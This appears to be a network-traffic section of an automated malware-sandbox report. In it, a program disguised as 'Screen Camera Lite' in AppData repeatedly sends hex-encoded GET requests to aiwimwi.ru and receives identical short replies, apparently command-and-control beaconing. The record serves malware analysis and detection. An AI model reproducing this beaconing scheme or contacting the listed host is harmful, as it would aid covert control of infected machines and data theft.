                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:35.819919109 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:35.928653955 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:36.169118881 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.450020185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:36.293586969 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:36.973829031 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.450026185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:37.122042894 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:37.838424921 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.450034185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:37.966448069 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:38.705658913 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.450040185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:38.825747013 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:39.564788103 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.450046185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:39.745018959 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:40.450546026 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.450049185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:40.574841022 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:41.291606903 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.450050185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:41.418926954 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:42.118408918 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:42.225620985 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:42.464155912 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.450051185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:42.591789007 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:43.306251049 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:43.413774967 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:43.654853106 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.450052185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:43.779031038 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:44.463315010 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.450053185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:44.593372107 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:45.282584906 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.450054185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:45.402929068 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:46.194369078 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.450055185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:46.343224049 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:47.051490068 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.450056185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:47.168603897 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:47.863882065 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.450057185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:47.985889912 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:48.674187899 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.450058185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:48.868442059 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:49.578221083 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.450059185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:49.699740887 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:50.395359993 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.450060185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:50.512280941 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:51.216778040 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.450061185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:51.357134104 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:52.047357082 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.450062185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:52.168857098 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:52.909086943 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.450063185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:53.028098106 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:53.787621021 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.450064185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:53.905524015 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:54.697433949 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.450065185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
